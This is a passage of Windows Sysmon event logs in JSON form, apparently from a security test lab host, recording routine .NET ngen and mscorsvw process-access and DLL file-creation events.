{"EventTime":"2020-08-01 08:04:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6684,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:04:02.898\r\nProcessGuid: {41C8662E-21F2-5F25-0000-001077700A00}\r\nProcessId: 4600\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11f8-0\\System.DirectoryServices.dll\r\nCreationUtcTime: 2020-08-01 08:04:02.898","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:04:02.898","ProcessGuid":"{41C8662E-21F2-5F25-0000-001077700A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11f8-0\\System.DirectoryServices.dll","CreationUtcTime":"2020-08-01 08:04:02.898","EventReceivedTime":"2020-08-01 08:04:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6685,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:02.961\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21DD-5F25-0000-0010DE220A00}\r\nTargetProcessId: 2264\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:02.961","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21DD-5F25-0000-0010DE220A00}","TargetProcessId":"2264","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6686,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:02.961\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21DD-5F25-0000-0010DE220A00}\r\nTargetProcessId: 2264\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:02.961","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21DD-5F25-0000-0010DE220A00}","TargetProcessId":"2264","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6687,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:02.961\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21DD-5F25-0000-0010DE220A00}\r\nTargetProcessId: 2264\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:02.961","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21DD-5F25-0000-0010DE220A00}","TargetProcessId":"2264","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6688,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:03.007\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21F3-5F25-0000-0010C6770A00}\r\nTargetProcessId: 3180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:03.007","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21F3-5F25-0000-0010C6770A00}","TargetProcessId":"3180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6689,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:03.007\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21F3-5F25-0000-0010C6770A00}\r\nTargetProcessId: 3180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:03.007","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21F3-5F25-0000-0010C6770A00}","TargetProcessId":"3180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6690,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:03.023\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21F3-5F25-0000-0010C6770A00}\r\nTargetProcessId: 3180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:03.023","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21F3-5F25-0000-0010C6770A00}","TargetProcessId":"3180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6691,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:04:03.523\r\nProcessGuid: {41C8662E-21F3-5F25-0000-0010C6770A00}\r\nProcessId: 3180\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c6c-0\\System.Transactions.dll\r\nCreationUtcTime: 2020-08-01 08:04:03.523","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:04:03.523","ProcessGuid":"{41C8662E-21F3-5F25-0000-0010C6770A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c6c-0\\System.Transactions.dll","CreationUtcTime":"2020-08-01 08:04:03.523","EventReceivedTime":"2020-08-01 08:04:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6692,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:03.554\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21F3-5F25-0000-0010C27B0A00}\r\nTargetProcessId: 3672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:03.554","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21F3-5F25-0000-0010C27B0A00}","TargetProcessId":"3672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\